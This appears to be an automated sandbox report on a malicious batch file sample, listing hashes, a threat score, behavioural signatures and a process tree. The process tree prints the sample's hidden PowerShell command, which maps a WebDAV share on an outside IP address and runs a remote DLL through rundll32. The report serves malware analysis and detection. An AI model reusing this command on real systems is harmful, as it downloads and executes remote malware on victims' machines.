Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
12439171432166231939.bat
Resource
win7-20240704-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
12439171432166231939.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
12439171432166231939.bat
-
Size
2KB
-
MD5
b731b375fbc90398d7920262c60f40bd
-
SHA1
ee1d1ee5d13439a51df74e7dbc291c4f146a76f3
-
SHA256
cf0646244c6f759d1f6c69e14f2fc0bab8f1e6fe99fde863b6edfc5bfda44777
-
SHA512
ac8d68fe1d1745a6380f25051b9f6077c0c8370292a75c09d89b1ad923e1ce122b98f774a54cb4570a44b55c359bef0ca22ed61c424f74a33d955ad5e02ec3ec
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1592 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1592 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2352 wordpad.exe 2352 wordpad.exe 2352 wordpad.exe 2352 wordpad.exe 2352 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2144 wrote to memory of 2352 2144 cmd.exe 29 PID 2144 wrote to memory of 2352 2144 cmd.exe 29 PID 2144 wrote to memory of 2352 2144 cmd.exe 29 PID 2144 wrote to memory of 1592 2144 cmd.exe 30 PID 2144 wrote to memory of 1592 2144 cmd.exe 30 PID 2144 wrote to memory of 1592 2144 cmd.exe 30 PID 1592 wrote to memory of 1912 1592 powershell.exe 32 PID 1592 wrote to memory of 1912 1592 powershell.exe 32 PID 1592 wrote to memory of 1912 1592 powershell.exe 32 PID 1592 wrote to memory of 1444 1592 powershell.exe 33 PID 1592 wrote to memory of 1444 1592 powershell.exe 33 PID 1592 wrote to memory of 1444 1592 powershell.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\12439171432166231939.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\4818.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:1912
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\4818.dll entry3⤵PID:1444
-
-